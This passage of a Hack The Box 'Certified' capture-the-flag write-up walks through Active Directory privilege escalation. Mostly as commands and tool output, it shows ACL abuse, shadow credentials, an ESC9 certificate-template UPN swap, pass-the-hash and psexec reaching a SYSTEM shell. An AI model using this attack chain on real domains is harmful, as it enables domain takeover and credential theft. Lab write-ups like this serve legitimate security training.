"CERTIFIED.HTB\\Enterprise Admins",
"CERTIFIED.HTB\\Administrator"
],
"Write Property Principals": [
"CERTIFIED.HTB\\Domain Admins",
"CERTIFIED.HTB\\Enterprise Admins",
"CERTIFIED.HTB\\Administrator"
]
}
},
"[!] Vulnerabilities": {
"ESC9": "'CERTIFIED.HTB\\\\operator ca' can enroll and template has no security extension"
}
}
}
} path to root
set owner to the magement group as judith
sh
owneredit.py -action write -new-owner 'judith.mader' -target 'Management' CERTIFIED/judith.mader:judith09 -dc-ip 10.10.11.41sh
dacledit.py -action write -rights WriteMembers -principal 'judith.mader' -target-dn 'CN=Management,CN=Users,DC=certified,DC=htb' CERTIFIED/judith.mader:judith09 -dc-ip 10.10.11.41sh
net rpc group addmem "Management" "judith.mader" -U "certified.htb"/"judith.mader"%"judith09" -S "10.10.11.41"Used pywhisker to create a certificate for management_svc:
sh
pywhisker -d "certified.htb" -u "judith.mader" -p judith09 --target "management_svc" --action add
[*] Searching for the target account
[*] Target user found: CN=management service,CN=Users,DC=certified,DC=htb
[*] Generating certificate
[*] Certificate generated
[*] Generating KeyCredential
[*] KeyCredential generated with DeviceID: f713e519-86a9-41b7-4840-6a1c4edadf62
[*] Updating the msDS-KeyCredentialLink attribute of management_svc
[+] Updated the msDS-KeyCredentialLink attribute of the target object
[+] Saved PFX (#PKCS12) certificate & key at path: xqaD7t8D.pfx
[*] Must be used with password: NgG9LRZMXBNJQNkofKVj
[*] A TGT can now be obtained with https://github.com/dirkjanm/PKINITtoolsGenerated a Kerberos TGT for management_svc:
sh
sudo ntpdate 10.10.11.41 & python3 /opt/linux/PKINITtools/gettgtpkinit.py certified.htb/management_svc -cert-pfx ./xqaD7t8D.pfx -pfx-pass NgG9LRZMXBNJQNkofKVj management_svc.ccache
[1] 369069
2025-01-10 06:31:05.570272 (-0500) +25201.672012 +/- 0.009065 10.10.11.41 s1 no-leap
CLOCK: time stepped by 25201.672012
[1] + done sudo ntpdate 10.10.11.41
2025-01-10 06:31:05,707 minikerberos INFO Loading certificate and key from file
INFO:minikerberos:Loading certificate and key from file
2025-01-10 06:31:05,719 minikerberos INFO Requesting TGT
INFO:minikerberos:Requesting TGT
2025-01-09 23:31:09,843 minikerberos INFO AS-REP encryption key (you might need this later):
INFO:minikerberos:AS-REP encryption key (you might need this later):
2025-01-09 23:31:09,843 minikerberos INFO 532544495529653ddc9df23d1f1d9dbdf50da4dfa817a2439701e1ead6afbb25
INFO:minikerberos:532544495529653ddc9df23d1f1d9dbdf50da4dfa817a2439701e1ead6afbb25
2025-01-09 23:31:09,845 minikerberos INFO Saved TGT to file
INFO:minikerberos:Saved TGT to filesh
export KRB5CCNAME=/home/sake/htb-labs/Certified/management_svc.ccacheExtracted NT hash for management_svc using gettgtpkinit.py:
sh
sudo ntpdate 10.10.11.41 & python3 /opt/linux/PKINITtools/getnthash.py certified.htb/management_svc -key 532544495529653ddc9df23d1f1d9dbdf50da4dfa817a2439701e1ead6afbb25
[1] 371340
2025-01-10 06:33:01.831006 (-0500) +25200.265573 +/- 0.010868 10.10.11.41 s1 no-leap
CLOCK: time stepped by 25200.265573
[1] + done sudo ntpdate 10.10.11.41
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Using TGT from cache
[*] Requesting ticket to self with PAC
Recovered NT Hash
a091c183...Used certipy-ad to modify ca_operator KeyCredential:
sh
sudo ntpdate 10.10.11.41 & certipy-ad shadow auto -u management_svc@certified.htb -hashes a091c183... -account ca_operator
[1] 373605
2025-01-10 06:34:32.131964 (-0500) +25200.267514 +/- 0.009241 10.10.11.41 s1 no-leap
CLOCK: time stepped by 25200.267514
[1] + done sudo ntpdate 10.10.11.41
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Targeting user 'ca_operator'
[*] Generating certificate
[*] Certificate generated
[*] Generating Key Credential
[*] Key Credential generated with DeviceID '5f80301d-c70f-0237-552c-9d6ca8a4086b'
[*] Adding Key Credential with device ID '5f80301d-c70f-0237-552c-9d6ca8a4086b' to the Key Credentials for 'ca_operator'
[*] Successfully added Key Credential with device ID '5f80301d-c70f-0237-552c-9d6ca8a4086b' to the Key Credentials for 'ca_operator'
[*] Authenticating as 'ca_operator' with the certificate
[*] Using principal: ca_operator@certified.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'ca_operator.ccache'
[*] Trying to retrieve NT hash for 'ca_operator'
[*] Restoring the old Key Credentials for 'ca_operator'
[*] Successfully restored the old Key Credentials for 'ca_operator'
[*] NT hash for 'ca_operator': 2b576acb...Updated the UPN (UserPrincipalName) of ca_operator to administrator:
sh
sudo ntpdate 10.10.11.41 & certipy-ad account update -u management_svc@certified.htb -hashes a091c183... -user ca_operator -upn administrator
[1] 376862
2025-01-10 06:36:28.337475 (-0500) +25200.273665 +/- 0.011748 10.10.11.41 s1 no-leap
CLOCK: time stepped by 25200.273665
[1] + done sudo ntpdate 10.10.11.41
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Updating user 'ca_operator':
userPrincipalName : administrator
[*] Successfully updated 'ca_operator'Requested a certificate for the administrator account using certipy-ad:
sh
sudo ntpdate 10.10.11.41 & certipy-ad req -username ca_operator@certified.htb -hashes 2b576acb... -ca certified-DC01-CA -template CertifiedAuthentication
[1] 379438
2025-01-10 06:37:37.878449 (-0500) +25200.403687 +/- 0.011098 10.10.11.41 s1 no-leap
CLOCK: time stepped by 25200.403687
[1] + done sudo ntpdate 10.10.11.41
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Requesting certificate via RPC
[*] Successfully requested certificate
[*] Request ID is 4
[*] Got certificate with UPN 'administrator'
[*] Certificate has no object SID
[*] Saved certificate and private key to 'administrator.pfx'Restored ca_operator’s UPN to its original value:
sh
sudo ntpdate 10.10.11.41 & certipy-ad account update -u management_svc@certified.htb -hashes a091c183... -user ca_operator -upn ca_operator@certified.htb Authenticated as administrator with the new certificate:
sh
sudo ntpdate -u 10.10.11.41 & certipy-ad auth -pfx administrator.pfx -domain certified.htb
[1] 408529
2025-01-10 06:46:40.329123 (-0500) +25200.298367 +/- 0.013500 10.10.11.41 s1 no-leap
CLOCK: time stepped by 25200.298367
[1] + done sudo ntpdate -u 10.10.11.41
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Using principal: administrator@certified.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@certified.htb': aad3b435...:0d5b4960...use admin hash to psexec
sh
impacket-psexec administrator@10.10.11.41 -hashes :0d5b4960...
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Requesting shares on 10.10.11.41.....
[*] Found writable share ADMIN$
[*] Uploading file ffZcpYFZ.exe
[*] Opening SVCManager on 10.10.11.41.....
[*] Creating service fvOJ on 10.10.11.41.....
[*] Starting service fvOJ.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.6414]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32> whoami
nt authority\systemroot.txt
s
C:\Users\Administrator\Desktop> type root.txt
0bc44169...Up next
EasyJan 2025
HTB — Alert
Markdown XSS for stored cross-site scripting. SSRF via file:// to leak local web app source code, exposed internal site with writable path for root.
Read writeup
EasyJan 2025
HTB — Chemistry
CIF file parser RCE via pymatgen CVE-2024-23346 arbitrary code execution. aiohttp path traversal CVE-2024-23334 for credential theft and lateral movement.
Read writeup
MediumJan 2025
HTB — Heal
ResumeAI app with IDOR exposing all resumes. LimeSurvey RCE via authenticated plugin upload. Consul service token for SYSTEM shell via API exec.
Read writeup